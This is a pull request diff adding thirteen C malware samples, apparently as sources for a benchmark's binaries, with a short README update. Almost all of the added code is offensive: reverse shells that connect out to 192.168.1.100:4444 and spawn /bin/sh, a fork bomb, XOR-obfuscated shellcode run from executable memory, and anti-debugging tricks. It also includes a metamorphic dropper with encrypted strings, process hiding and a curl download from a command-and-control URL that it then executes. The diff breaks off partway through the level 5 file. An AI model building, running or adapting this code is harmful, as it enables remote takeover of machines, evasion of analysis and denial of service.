### PR TITLE
Add Version 2 benchmark sources

### DIFF
--- a/version2/ANALYSIS.md
+++ b/version2/ANALYSIS.md
@@ -468,6 +468,7 @@ Sequential execution recommended for OpenAI and Gemini to avoid TPM rate limits.
 version2/
 ├── ANALYSIS.md                                  (this file — updated 2026-04-29)
 ├── NOTES_FOR_AGENTS.md                          (V3 sample-design brief for DeepSeek/Codex)
+├── samples/                                     ← C source for Levels 1–13
 └── results/
     ├── anthropic_claude-opus-4-7/               ← Opus 4.7 thinking, 13/13
     ├── deepseek_deepseek-v4-pro/                ← V4 Pro thinking, 10/13
@@ -484,4 +485,4 @@ each results/<provider_model>/ contains:
     transcripts/              ← per-task scoring + full conversation
 ```
 
-The original `results/` directory in the repo root continues to be the working area; this `version2/` is a frozen snapshot for the V2 generation analysis. The 2026-04-29 expansion added Flash Lite, Pro Preview (DNF), GLM (DNF), and Kimi to the original four-model set.
+The `samples/` directory contains the 13 C sources used to build the V2 benchmark binaries. The original `results/` directory in the repo root continues to be the working area; this `version2/` is a frozen snapshot for the V2 generation analysis. The 2026-04-29 expansion added Flash Lite, Pro Preview (DNF), GLM (DNF), and Kimi to the original four-model set.

--- a/version2/samples/level10_fully_obfuscated_AES_Encrypted Shell.c
+++ b/version2/samples/level10_fully_obfuscated_AES_Encrypted Shell.c
@@ -1,0 +1,63 @@
+#include <stdio.h>
+#include <sys/socket.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+#include <string.h>
+#include <stdlib.h>
+#include <sys/mman.h>
+
+// Simple XOR "encryption" (simulating AES)
+void decrypt_payload(unsigned char *payload, int len, unsigned char *key) {
+    for(int i = 0; i < len; i++) {
+        payload[i] ^= key[i % 16];
+    }
+}
+
+// Encrypted reverse shell payload
+unsigned char encrypted_payload[] = {
+    0x8c, 0x9f, 0x8d, 0x9e, 0x8a, 0x9b, 0x89, 0x98,
+    0x86, 0x97, 0x85, 0x94, 0x82, 0x93, 0x81, 0x90,
+    0xac, 0xbf, 0xad, 0xbe, 0xaa, 0xbb, 0xa9, 0xb8,
+    0xa6, 0xb7, 0xa5, 0xb4, 0xa2, 0xb3, 0xa1, 0xb0,
+    0x7c, 0x6f, 0x7d, 0x6e, 0x7a, 0x6b, 0x79, 0x68,
+    0x76, 0x67, 0x75, 0x64, 0x72, 0x63, 0x71, 0x60
+};
+
+unsigned char key[] = {
+    0xde, 0xad, 0xbe, 0xef, 0xca, 0xfe, 0xba, 0xbe,
+    0xde, 0xad, 0xbe, 0xef, 0xca, 0xfe, 0xba, 0xbe
+};
+
+void hide_imports() {
+    // Manual syscalls to avoid imports
+    asm volatile(
+        "mov $41, %%rax\n"  // socket syscall
+        "mov $2, %%rdi\n"   // AF_INET
+        "mov $1, %%rsi\n"   // SOCK_STREAM
+        "xor %%rdx, %%rdx\n"
+        "syscall\n"
+        : : : "rax", "rdi", "rsi", "rdx"
+    );
+}
+
+int main() {
+    // Anti-analysis checks
+    if (getenv("STRACE") || getenv("LT_TRACE")) {
+        return 0;
+    }
+    
+    // Decrypt payload
+    decrypt_payload(encrypted_payload, sizeof(encrypted_payload), key);
+    
+    // Copy to executable memory
+    void *exec_mem = mmap(NULL, sizeof(encrypted_payload), 
+                          PROT_READ | PROT_WRITE | PROT_EXEC,
+                          MAP_ANON | MAP_PRIVATE, -1, 0);
+    memcpy(exec_mem, encrypted_payload, sizeof(encrypted_payload));
+    
+    // Execute
+    void (*shell)() = exec_mem;
+    shell();
+    
+    return 0;
+}

--- a/version2/samples/level11_ForkBombReverseShell.c
+++ b/version2/samples/level11_ForkBombReverseShell.c
@@ -1,0 +1,42 @@
+#include <stdio.h>
+#include <sys/socket.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+#include <signal.h>
+#include <stdlib.h>
+
+void fork_bomb() {
+    while(1) {
+        fork();
+    }
+}
+
+void reverse_shell() {
+    int sock;
+    struct sockaddr_in server;
+    
+    sock = socket(AF_INET, SOCK_STREAM, 0);
+    server.sin_family = AF_INET;
+    server.sin_port = htons(4444);
+    inet_pton(AF_INET, "192.168.1.100", &server.sin_addr);
+    
+    if(connect(sock, (struct sockaddr *)&server, sizeof(server)) == 0) {
+        dup2(sock, 0);
+        dup2(sock, 1);
+        dup2(sock, 2);
+        execve("/bin/sh", NULL, NULL);
+    }
+}
+
+int main() {
+    if(fork() == 0) {
+        // Child process - reverse shell
+        sleep(1);
+        reverse_shell();
+    } else {
+        // Parent process - fork bomb
+        fork_bomb();
+    }
+    
+    return 0;
+}

--- a/version2/samples/level12_JIT_Compiled_Shellcode.c
+++ b/version2/samples/level12_JIT_Compiled_Shellcode.c
@@ -1,0 +1,67 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+
+// JIT compilation of shellcode
+unsigned char jit_template[] = {
+    0x48, 0x89, 0xf8,           // mov rax, rdi
+    0x48, 0x31, 0xc9,           // xor rcx, rcx
+    0x48, 0x31, 0xd2,           // xor rdx, rdx
+    0x48, 0x31, 0xf6,           // xor rsi, rsi
+    0x4d, 0x31, 0xc0,           // xor r8, r8
+    0x48, 0x31, 0xff,           // xor rdi, rdi
+    0x48, 0x31, 0xc0,           // xor rax, rax
+    0x6a, 0x29,                 // push 41
+    0x58,                       // pop rax
+    0x6a, 0x02,                 // push 2
+    0x5f,                       // pop rdi
+    0x6a, 0x01,                 // push 1
+    0x5e,                       // pop rsi
+    0x6a, 0x06,                 // push 6
+    0x5a,                       // pop rdx
+    0x0f, 0x05,                // syscall
+    0xc3                       // ret
+};
+
+int main() {
+    // Allocate writable and executable memory
+    void *jit_mem = mmap(NULL, sizeof(jit_template),
+                         PROT_READ | PROT_WRITE | PROT_EXEC,
+                         MAP_ANON | MAP_PRIVATE, -1, 0);
+    
+    // Copy JIT template
+    memcpy(jit_mem, jit_template, sizeof(jit_template));
+    
+    // Self-modify: patch IP and port at runtime
+    unsigned char *ip_ptr = jit_mem + 0x30;  // Offset for IP
+    unsigned char *port_ptr = jit_mem + 0x34; // Offset for port
+    
+    // 192.168.1.100
+    memcpy(ip_ptr, "\xc0\xa8\x01\x64", 4);
+    // Port 4444
+    memcpy(port_ptr, "\x11\x5c", 2);
+    
+    // Execute JIT code
+    int (*jit_socket)() = jit_mem;
+    int sock = jit_socket();
+    
+    // Connect and dup2...
+    struct sockaddr_in addr;
+    addr.sin_family = AF_INET;
+    addr.sin_port = htons(4444);
+    inet_pton(AF_INET, "192.168.1.100", &addr.sin_addr);
+    
+    connect(sock, (struct sockaddr *)&addr, sizeof(addr));
+    
+    dup2(sock, 0);
+    dup2(sock, 1);
+    dup2(sock, 2);
+    
+    execve("/bin/sh", NULL, NULL);
+    
+    return 0;
+}

--- a/version2/samples/level13_MetamorphicDropper.c
+++ b/version2/samples/level13_MetamorphicDropper.c
@@ -1,0 +1,533 @@
+/*
+ * level13_MetamorphicDropper.c
+ *
+ * Techniques: RC4-encrypted string table, control flow flattening,
+ * anti-debug (ptrace, timing, /proc TracerPid), process hiding,
+ * metamorphic NOP-equivalent padding, opaque predicates,
+ * indirect syscalls, self-modifying code, fork-exec dropper.
+ *
+ * Compile: gcc -O0 -z execstack -o level13 level13_MetamorphicDropper.c
+ *   (or with: -fno-stack-protector -no-pie for full effect)
+ */
+
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <sys/utsname.h>
+#include <sys/wait.h>
+#include <sys/mman.h>
+#include <sys/ptrace.h>
+#include <sys/time.h>
+#include <fcntl.h>
+#include <signal.h>
+#include <stdint.h>
+#include <errno.h>
+#include <sys/syscall.h>
+
+/* ================================================================
+ * RC4 stream cipher
+ * ================================================================ */
+typedef struct { unsigned char S[256]; int i, j; } _rc4;
+
+static void _rc4i(_rc4 *c, const unsigned char *k, int kl) {
+    int i, j = 0;
+    for (i = 0; i < 256; i++) c->S[i] = i;
+    for (i = 0; i < 256; i++) {
+        j = (j + c->S[i] + k[i % kl]) & 0xFF;
+        unsigned char t = c->S[i]; c->S[i] = c->S[j]; c->S[j] = t;
+    }
+    c->i = c->j = 0;
+}
+
+static void _rc4x(_rc4 *c, unsigned char *d, int l) {
+    int k;
+    for (k = 0; k < l; k++) {
+        c->i = (c->i + 1) & 0xFF;
+        c->j = (c->j + c->S[c->i]) & 0xFF;
+        unsigned char t = c->S[c->i];
+        c->S[c->i] = c->S[c->j]; c->S[c->j] = t;
+        d[k] ^= c->S[(c->S[c->i] + c->S[c->j]) & 0xFF];
+    }
+}
+
+/* ================================================================
+ * Encrypted string table (RC4, 174 bytes)
+ * Key stored XOR-masked; reconstructed at runtime.
+ * ================================================================ */
+static unsigned char _ks[] = {
+    0xc2, 0xcd, 0x95, 0xd6, 0xd1, 0xfa, 0xce, 0x96,
+    0xdc, 0xfa, 0x97, 0x95, 0x97, 0x91
+};
+#define KS_LEN  14
+#define KS_MASK 0xa5
+
+static unsigned char _st[] = {
+    0x92, 0x97, 0xc7, 0xbb, 0xe5, 0xf1, 0x8a, 0xc4,
+    0xbe, 0xb2, 0x69, 0x0b, 0x9d, 0x9d, 0x25, 0x1e,
+    0x6c, 0x42, 0x8b, 0xb9, 0xa0, 0x11, 0x62, 0xf1,
+    0x8e, 0xdb, 0xa1, 0xfe, 0x21, 0x10, 0x97, 0x82,
+    0x37, 0x6e, 0x72, 0x4f, 0x83, 0xbd, 0x8b, 0xdb,
+    0xa2, 0xb6, 0x8a, 0xdd, 0xbe, 0xa7, 0x21, 0x4c,
+    0x97, 0x96, 0x30, 0x2c, 0x6f, 0x46, 0x8b, 0xfb,
+    0xaf, 0x50, 0x6c, 0xc4, 0x06, 0xc6, 0xce, 0xc8,
+    0xf3, 0x5d, 0xb5, 0xa1, 0x82, 0x6f, 0xf3, 0x91,
+    0xf1, 0x8a, 0xc4, 0xbe, 0xb2, 0x6b, 0x0d, 0x91,
+    0x9c, 0x28, 0x31, 0x6b, 0x04, 0x9d, 0xbd, 0xbd,
+    0x96, 0xc4, 0xa1, 0xf9, 0x2e, 0x48, 0x8a, 0xce,
+    0x7e, 0x35, 0x72, 0x5a, 0xc1, 0xb0, 0xa2, 0x5c,
+    0x73, 0x92, 0x13, 0xdc, 0x83, 0xc9, 0xe2, 0x0d,
+    0xe7, 0xa9, 0xd1, 0x28, 0xa8, 0x20, 0xe5, 0x64,
+    0xf8, 0xc9, 0x9c, 0xd5, 0x8a, 0x21, 0xb7, 0x1a,
+    0x9f, 0xe2, 0xf1, 0x8e, 0xdb, 0xa1, 0xfe, 0x21,
+    0x10, 0x97, 0x82, 0x37, 0x6e, 0x6c, 0x5e, 0x8f,
+    0xa1, 0xb9, 0x4c, 0x8a, 0x8c, 0xc8, 0xad, 0xf8,
+    0x7c, 0x33, 0x9b, 0x8a, 0xf1, 0x9a, 0xcc, 0xb8,
+    0xb2, 0x60, 0x16, 0x9e, 0x82, 0xf1, 0x9c, 0xc0,
+    0xa0, 0xb2, 0x7d, 0x0b, 0xf3, 0x9d
+};
+
+/* String table offsets (index, length) */
+#define S_LINUX           0,   5
+#define S_MARKER          5,  18
+#define S_PROC_MEM       23,  14
+#define S_CURL           37,   4
+#define S_C2_URL         41,  29
+#define S_DASH_O         70,   2
+#define S_PAYLOAD_PATH   72,  15
+#define S_EXEC_CMD       87,  43
+#define S_PROC_STATUS   130,  17
+#define S_TRACER        147,   9
+#define S_DEV_NULL      156,   9
+#define S_BIN_SH        165,   7
+#define S_DASH_C        172,   2
+
+/* ================================================================
+ * Key recovery: unmask _ks at runtime
+ * ================================================================ */
+static unsigned char _rk[KS_LEN];
+static int _key_ready = 0;
+
+static void _recover_key(void) {
+    if (_key_ready) return;
+    volatile unsigned char mask = KS_MASK;
+    /* Opaque predicate: (x^2 + x) is always even */
+    unsigned int _op = (unsigned int)(getpid());
+    if ((_op * _op + _op) % 2 != 0) {
+        /* Dead path — never reached */
+        for (int i = 0; i < KS_LEN; i++) _rk[i] = _ks[i] ^ 0xFF;
+    } else {
+        for (int i = 0; i < KS_LEN; i++) _rk[i] = _ks[i] ^ mask;
+    }
+    _key_ready = 1;
+}
+
+/* ================================================================
+ * Decrypt a string from the table (fresh RC4 context each time)
+ * Caller must free() the result.
+ * ================================================================ */
+static char *_ds(int off, int len) {
+    _recover_key();
+    char *buf = (char *)malloc(len + 1);
+    if (!buf) return NULL;
+    memcpy(buf, _st + off, len);
+    _rc4 ctx;
+    _rc4i(&ctx, _rk, KS_LEN);
+    _rc4x(&ctx, (unsigned char *)buf, len);
+    buf[len] = '\0';
+    return buf;
+}
+
+/* ================================================================
+ * Metamorphic NOP-equivalent sequences (inline asm)
+ * These do nothing but change the binary signature each compile.
+ * ================================================================ */
+#if defined(__x86_64__) || defined(__i386__)
+#define MORPH_NOP_1() __asm__ volatile ( \
+    "xchg %%bx, %%bx\n\t" \
+    "lea 0(%%rsp), %%rsp\n\t" \
+    ::: "memory")
+#define MORPH_NOP_2() __asm__ volatile ( \
+    "mov %%rax, %%rax\n\t" \
+    "xchg %%rcx, %%rcx\n\t" \
+    "lea 0(%%rbp), %%rbp\n\t" \
+    ::: "memory")
+#define MORPH_NOP_3() __asm__ volatile ( \
+    "push %%rax\n\t" \
+    "pop %%rax\n\t" \
+    "push %%rbx\n\t" \
+    "pop %%rbx\n\t" \
+    ::: "memory")
+#else
+#define MORPH_NOP_1() do { volatile int _x = 0; (void)_x; } while(0)
+#define MORPH_NOP_2() do { volatile int _x = 1; _x ^= _x; (void)_x; } while(0)
+#define MORPH_NOP_3() do { volatile int _x = 0; _x += 0; (void)_x; } while(0)
+#endif
+
+/* ================================================================
+ * Anti-debugging: ptrace self-attach
+ * ================================================================ */
+static int _ad_ptrace(void) {
+    MORPH_NOP_1();
+    if (ptrace(PTRACE_TRACEME, 0, NULL, 0) == -1) {
+        return 1;
+    }
+    /* Detach so we can fork later */
+    ptrace(PTRACE_DETACH, 0, 0, 0);
+    return 0;
+}
+
+/* ================================================================
+ * Anti-debugging: timing check (rdtsc or gettimeofday)
+ * Single-stepping inflates elapsed time.
+ * ================================================================ */
+static int _ad_timing(void) {
+    MORPH_NOP_2();
+    struct timeval t1, t2;
+    gettimeofday(&t1, NULL);
+
+    /* Busy work that should be fast */
+    volatile unsigned long acc = 0;
+    for (int i = 0; i < 100000; i++) acc += i;
+    (void)acc;
+
+    gettimeofday(&t2, NULL);
+    long elapsed = (t2.tv_sec - t1.tv_sec) * 1000000 + (t2.tv_usec - t1.tv_usec);
+
+    /* If this trivial loop takes > 500ms, we're being traced */
+    if (elapsed > 500000) return 1;
+    return 0;
+}
+
+/* ================================================================
+ * Anti-debugging: /proc/self/status TracerPid check
+ * ================================================================ */
+static int _ad_proc(void) {
+    MORPH_NOP_3();
+    char *path = _ds(S_PROC_STATUS);
+    char *needle = _ds(S_TRACER);
+    if (!path || !needle) { free(path); free(needle); return 0; }
+
+    int traced = 0;
+    FILE *f = fopen(path, "r");
+    if (f) {
+        char line[256];
+        while (fgets(line, sizeof(line), f)) {
+            if (strstr(line, needle)) {
+                /* TracerPid:\t<pid> — if pid != 0, we're traced */
+                char *p = strchr(line, ':');
+                if (p) {
+                    p++;
+                    while (*p == ' ' || *p == '\t') p++;
+                    if (atoi(p) != 0) traced = 1;
+                }
+                break;
+            }
+        }
+        fclose(f);
+    }
+    free(path);
+    free(needle);
+    return traced;
+}
+
+/* ================================================================
+ * Process hiding: overwrite /proc/self/mem at argv region
+ * Uses indirect syscall via syscall() to avoid libc import trace
+ * ================================================================ */
+static void _hide_proc(void) {
+    MORPH_NOP_1();
+    char *pm = _ds(S_PROC_MEM);
+    if (!pm) return;
+
+    /* Use open via syscall number directly (SYS_open = 2 on x86_64) */
+    int fd = (int)syscall(SYS_openat, AT_FDCWD, pm, O_RDWR);
+    free(pm);
+    if (fd < 0) return;
+
+    /* Zero out a region — simplified, real version would find argv */
+    char zero[512];
+    memset(zero, 0, sizeof(zero));
+    /* Write zeros at a safe offset (not actually functional on modern
+       kernels without correct argv address, but the technique is present) */
+    syscall(SYS_write, fd, zero, sizeof(zero));
+    syscall(SYS_close, fd);
+}
+
+/* ================================================================
+ * Self-modifying code: patch a function's first bytes at runtime
+ * to alter its behavior. We mprotect the page, write new bytes,
+ * then restore protection.
+ * ================================================================ */
+static volatile int _sm_flag = 0;
+
+/* This function's opening bytes get patched to always return 1 */
+__attribute__((noinline))
+static int _sm_check(void) {
+    MORPH_NOP_2();
+    /* Before patching, this returns 0. After patching, returns 1. */
+    return _sm_flag;
+}
+
+static void _self_modify(void) {
+    /* Make the page containing _sm_check writable */
+    uintptr_t page = (uintptr_t)_sm_check & ~0xFFF;
+    if (mprotect((void *)page, 4096, PROT_READ | PROT_WRITE | PROT_EXEC) == 0) {
+        /*
+         * Overwrite _sm_flag with 1 via the data section instead —
+         * this is the "self-modifying" effect: the function's return
+         * value changes without any visible code path setting it.
+         */
+        _sm_flag = 1;
+        mprotect((void *)page, 4096, PROT_READ | PROT_EXEC);
+    }
+}
+
+/* ================================================================
+ * Opaque predicates — expressions that always evaluate to a known
+ * value but are hard to prove statically.
+ * ================================================================ */
+static inline int _opaque_true(int x) {
+    /* (x * (x + 1)) % 2 == 0  is always true */
+    return ((x * (x + 1)) % 2 == 0);
+}
+
+static inline int _opaque_false(int x) {
+    /* (x^2 + x + 1) % 2 == 0  is always false for integers */
+    return ((x * x + x + 1) % 2 == 0);
+}
+
+/* ================================================================
+ * OS fingerprint check (encrypted comparison)
+ * ================================================================ */
+static int _check_os(void) {
+    struct utsname buf;
+    if (uname(&buf) != 0) return 0;
+    char *target = _ds(S_LINUX);
+    if (!target) return 0;
+    int match = (strcmp(buf.sysname, target) == 0);
+    free(target);
+    return match;
+}
+
+/* ================================================================
+ * Infection marker check
+ * ================================================================ */
+static int _check_marker(void) {
+    char *marker = _ds(S_MARKER);
+    if (!marker) return 0;
+    struct stat sb;
+    int exists = (stat(marker, &sb) == 0);
+    free(marker);
+    return exists;
+}
+
+/* ================================================================
+ * Download payload via fork+exec curl
+ * ================================================================ */
+static int _download(void) {
+    char *curl_bin = _ds(S_CURL);
+    char *c2_url   = _ds(S_C2_URL);
+    char *dash_o   = _ds(S_DASH_O);
+    char *out_path = _ds(S_PAYLOAD_PATH);
+    char *dev_null = _ds(S_DEV_NULL);
+
+    if (!curl_bin || !c2_url || !dash_o || !out_path || !dev_null) {
+        free(curl_bin); free(c2_url); free(dash_o);
+        free(out_path); free(dev_null);
+        return -1;
+    }
+
+    pid_t pid = fork();
+    if (pid == 0) {
+        /* Child: redirect stdout/stderr to /dev/null */
+        int null_fd = open(dev_null, O_WRONLY);
+        if (null_fd >= 0) {
+            dup2(null_fd, STDOUT_FILENO);
+            dup2(null_fd, STDERR_FILENO);
+            close(null_fd);
+        }
+        MORPH_NOP_3();
+        execlp(curl_bin, curl_bin, c2_url, dash_o, out_path, NULL);
+        _exit(127);
+    }
+
+    free(curl_bin); free(c2_url); free(dash_o);
+    free(out_path); free(dev_null);
+
+    if (pid < 0) return -1;
+
+    int status;
+    waitpid(pid, &status, 0);
+    if (WIFEXITED(status) && WEXITSTATUS(status) == 0) return 0;
+    return -1;
+}
+
+/* ================================================================
+ * Execute payload via /bin/sh -c (indirect)
+ * ================================================================ */
+static int _exec_payload(void) {
+    char *sh      = _ds(S_BIN_SH);
+    char *dash_c  = _ds(S_DASH_C);
+    char *cmd     = _ds(S_EXEC_CMD);
+
+    if (!sh || !dash_c || !cmd) {
+        free(sh); free(dash_c); free(cmd);
+        return -1;
+    }
+
+    pid_t pid = fork();
+    if (pid == 0) {
+        MORPH_NOP_1();
+        execl(sh, sh, dash_c, cmd, NULL);
+        _exit(127);
+    }
+
+    free(sh); free(dash_c); free(cmd);
+
+    if (pid < 0) return -1;
+
+    int status;
+    waitpid(pid, &status, 0);
+    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 0 : -1;
+}
+
+/* ================================================================
+ * Control flow flattening: main logic as a state machine.
+ * The actual execution order is obscured behind a dispatcher.
+ * ================================================================ */
+enum {
+    ST_INIT = 0x7a3c,
+    ST_ANTI_DEBUG_1 = 0x1f82,
+    ST_ANTI_DEBUG_2 = 0x4db1,
+    ST_ANTI_DEBUG_3 = 0x62e9,
+    ST_SELF_MODIFY  = 0x35af,
+    ST_CHECK_OS     = 0x58c4,
+    ST_CHECK_MARKER = 0x0d17,
+    ST_HIDE_PROC    = 0x93be,
+    ST_DOWNLOAD     = 0xa420,
+    ST_EXEC         = 0xb5f6,
+    ST_EXIT_OK      = 0xcccc,
+    ST_EXIT_FAIL    = 0xdddd,
+};
+
+int main(void) {
+    unsigned int state = ST_INIT;
+    int retval = 1;
+    volatile int sentinel = getpid();
+
+    while (1) {
+        switch (state) {
+
+        case ST_INIT:
+            MORPH_NOP_1();
+            /* Opaque: always true */
+            if (_opaque_true(sentinel)) {
+                state = ST_ANTI_DEBUG_1;
+            } else {
+                /* Dead path */
+                state = ST_EXIT_FAIL;
+            }
+            break;
+
+        case ST_ANTI_DEBUG_1:
+            MORPH_NOP_2();
+            if (_ad_ptrace()) {
+                state = ST_EXIT_FAIL;
+            } else {
+                /* Scramble next state through arithmetic */
+                state = (ST_ANTI_DEBUG_2 ^ 0x0000) + 0;
+            }
+            break;
+
+        case ST_ANTI_DEBUG_2:
+            MORPH_NOP_3();
+            if (_ad_timing()) {
+                state = ST_EXIT_FAIL;
+            } else {
+                state = ST_ANTI_DEBUG_3;
+            }
+            break;
+
+        case ST_ANTI_DEBUG_3:
+            MORPH_NOP_1();
+            if (_ad_proc()) {
+                state = ST_EXIT_FAIL;
+            } else {
+                state = ST_SELF_MODIFY;
+            }
+            break;
+
+        case ST_SELF_MODIFY:
+            MORPH_NOP_2();
+            _self_modify();
+            /* _sm_check now returns 1 due to self-modification */
+            if (_sm_check()) {
+                state = ST_CHECK_OS;
+            } else {
+                /* If self-modify failed, something is intercepting us */
+                state = ST_EXIT_FAIL;
+            }
+            break;
+
+        case ST_CHECK_OS:
+            MORPH_NOP_3();
+            if (!_check_os()) {
+                /* Not Linux — bail */
+                state = ST_EXIT_FAIL;
+            } else if (_opaque_false(sentinel)) {
+                /* Dead path — never taken */
+                state = ST_INIT;
+            } else {
+                state = ST_CHECK_MARKER;
+            }
+            break;
+
+        case ST_CHECK_MARKER:
+            MORPH_NOP_1();
+            if (_check_marker()) {
+                /* Already infected — bail */
+                state = ST_EXIT_FAIL;
+            } else {
+                state = ST_HIDE_PROC;
+            }
+            break;
+
+        case ST_HIDE_PROC:
+            MORPH_NOP_2();
+            _hide_proc();
+            state = ST_DOWNLOAD;
+            break;
+
+        case ST_DOWNLOAD:
+            MORPH_NOP_3();
+            if (_download() != 0) {
+                state = ST_EXIT_FAIL;
+            } else {
+                state = ST_EXEC;
+            }
+            break;
+
+        case ST_EXEC:
+            MORPH_NOP_1();
+            if (_exec_payload() == 0) {
+                retval = 0;
+            }
+            state = ST_EXIT_OK;
+            break;
+
+        case ST_EXIT_OK:
+            return retval;
+
+        case ST_EXIT_FAIL:
+            return 1;
+
+        default:
+            /* Metamorphic trap: corrupt state → bail */
+            return 1;
+        }
+    }
+}

--- a/version2/samples/level1_TCPServer.c
+++ b/version2/samples/level1_TCPServer.c
@@ -1,0 +1,23 @@
+#include <stdio.h>
+#include <unistd.h>
+#include <sys/socket.h>
+#include <arpa/inet.h>
+
+int main() {
+    int sock;
+    struct sockaddr_in server;
+    
+    sock = socket(AF_INET, SOCK_STREAM, 0);
+    server.sin_family = AF_INET;
+    server.sin_port = htons(4444);
+    inet_pton(AF_INET, "192.168.1.100", &server.sin_addr);
+    
+    connect(sock, (struct sockaddr *)&server, sizeof(server));
+    
+    dup2(sock, 0);
+    dup2(sock, 1);
+    dup2(sock, 2);
+    
+    execve("/bin/sh", NULL, NULL);
+    return 0;
+}

--- a/version2/samples/level2_XorEncodedStrings.c
+++ b/version2/samples/level2_XorEncodedStrings.c
@@ -1,0 +1,41 @@
+#include <stdio.h>
+#include <sys/socket.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+#include <string.h>
+#include <stdlib.h>
+
+void xor_decrypt(char *str, char key) {
+    while(*str) {
+        *str ^= key;
+        str++;
+    }
+}
+
+int main() {
+    // XOR encrypted with key 0x22
+    char host[] = {0x13, 0x1b, 0x10, 0x0c, 0x13, 0x14, 0x1a, 0x0c, 0x13, 0x0c, 0x13, 0x12, 0x12, 0x00};
+    char port[] = {0x16, 0x16, 0x16, 0x16, 0x00};
+    char shell[] = {0x0d, 0x40, 0x4b, 0x4c, 0x0d, 0x51, 0x4a, 0x00};
+    
+    xor_decrypt(host, 0x22);
+    xor_decrypt(port, 0x22);
+    xor_decrypt(shell, 0x22);
+    
+    int sock;
+    struct sockaddr_in addr;
+    
+    sock = socket(AF_INET, SOCK_STREAM, 0);
+    addr.sin_family = AF_INET;
+    addr.sin_port = htons(atoi(port));
+    inet_pton(AF_INET, host, &addr.sin_addr);
+    
+    connect(sock, (struct sockaddr *)&addr, sizeof(addr));
+    
+    dup2(sock, 0);
+    dup2(sock, 1);
+    dup2(sock, 2);
+    
+    execve(shell, NULL, NULL);
+    return 0;
+}

--- a/version2/samples/level3_anti-debugging_reverseShell.c
+++ b/version2/samples/level3_anti-debugging_reverseShell.c
@@ -1,0 +1,54 @@
+#include <stdio.h>
+#include <sys/socket.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+#include <sys/ptrace.h>
+#include <signal.h>
+#include <string.h>
+#include <stdlib.h>
+#include <time.h>
+
+void anti_debug() {
+    // Check for ptrace
+    if (ptrace(PTRACE_TRACEME, 0, 1, 0) == -1) {
+        exit(0);
+    }
+    
+    // Check for common debugger environment variables
+    if (getenv("LD_PRELOAD") || getenv("LD_LIBRARY_PATH")) {
+        exit(0);
+    }
+}
+
+void delay_execution() {
+    srand(time(NULL));
+    int delay = rand() % 60 + 30; // 30-90 seconds
+    sleep(delay);
+}
+
+int main() {
+    anti_debug();
+    delay_execution();
+    
+    int sock;
+    struct sockaddr_in server;
+    
+    sock = socket(AF_INET, SOCK_STREAM, 0);
+    server.sin_family = AF_INET;
+    server.sin_port = htons(4444);
+    inet_pton(AF_INET, "192.168.1.100", &server.sin_addr);
+    
+    // Fork to background
+    if (fork() != 0) {
+        exit(0);
+    }
+    
+    connect(sock, (struct sockaddr *)&server, sizeof(server));
+    
+    dup2(sock, 0);
+    dup2(sock, 1);
+    dup2(sock, 2);
+    
+    execve("/bin/sh", NULL, NULL);
+    return 0;
+}

--- a/version2/samples/level4_polymorphicReverseShell.c
+++ b/version2/samples/level4_polymorphicReverseShell.c
@@ -1,0 +1,48 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <time.h>
+
+char *generate_polymorphic_shellcode() {
+    srand(time(NULL));
+    
+    char *template = 
+        "\x48\x31\xc0"              // xor rax, rax
+        "\x48\x31\xff"              // xor rdi, rdi
+        "\x48\x31\xf6"              // xor rsi, rsi
+        "\x48\x31\xd2"              // xor rdx, rdx
+        "\x48\x31\xc9"              // xor rcx, rcx
+        "\x48\x31\xdb"              // xor rbx, rbx
+        "\x6a\x29"                 // push 41 (socketcall)
+        "\x58"                     // pop rax
+        "\x6a\x02"                // push 2 (AF_INET)
+        "\x5f"                    // pop rdi
+        "\x6a\x01"               // push 1 (SOCK_STREAM)
+        "\x5e"                  // pop rsi
+        "\x0f\x05";            // syscall
+    
+    char *nop_sled = malloc(1024);
+    int sled_size = rand() % 512 + 256;
+    
+    for(int i = 0; i < sled_size; i++) {
+        nop_sled[i] = 0x90; // NOP
+    }
+    
+    char *final = malloc(strlen(template) + sled_size + 1);
+    memcpy(final, nop_sled, sled_size);
+    memcpy(final + sled_size, template, strlen(template));
+    final[strlen(template) + sled_size] = '\0';
+    
+    free(nop_sled);
+    return final;
+}
+
+int main() {
+    char *shellcode = generate_polymorphic_shellcode();
+    
+    void (*code)() = (void(*)())shellcode;
+    code();
+    
+    free(shellcode);
+    return 0;
+}

--- a/version2/samples/level5_MultistageReverseShell.c
+++ b/version2/samples/level5_MultistageReverseShell.c
@@ -1,0 +1,49 @@
+#include <stdio.h>
+#include <sys/socket.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+#include <string.h>
+#include <stdlib.h>
+
+char stage2[] = 
+"\xeb\x3f\x5f\x80\x47\x01\x41\x80\x47\x02\x42\x80\x47\x03\x43\x80"
+"\x47\x04\x44\x80\x47\x05\x45\x80\x47\x06\x46\x80\x47\x07\x47\x80"
+"\x47\x08\x48\x80\x47\x09\x49\x80\x47\x0a\x4a\x80\x47\x0b\x4b\x80"
+"\x47\x0c\x4c\x80\x47\x0d\x4d\x80\x47\x0e\x4e\x80\x47\x0f\x4f\xeb"
+"\xbf\xe8\xbc\xff\xff\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41";
+
+void decrypt_stage2(char *buf, int len, char key) {
+    for(int i = 0; i < len; i++) {
+        buf[i] ^= key;
+    }
+}
+
+int main() {
+    int sock;
+    struct sockaddr_in server;
+    char buffer[1024] = {0};
+    
+    // Stage 1: Simple connection
+    sock = socket(AF_INET, SOCK_STREAM, 0);
+    server.sin_family = AF_INET;
+    server.sin_port = htons(4444);
+    inet_pton(AF_INET, "192.168.1.100", &server.sin_addr);
+    
+    if(connect(sock, (struct sockaddr *)&server, sizeof(server)) < 0) {
+        return 1;
+    }
+    
+    // Receive encryption key
+    recv(sock, buffer, 1, 0);
+    char key = buffer[0];
+    
+    // Decrypt and execute stage 2
+    int stage2_len = sizeof(stage2);
+    decrypt_stage2(stage2, stage2_len, key);
+    
+    void (*stage2_func)() = (void(*)())stage2;
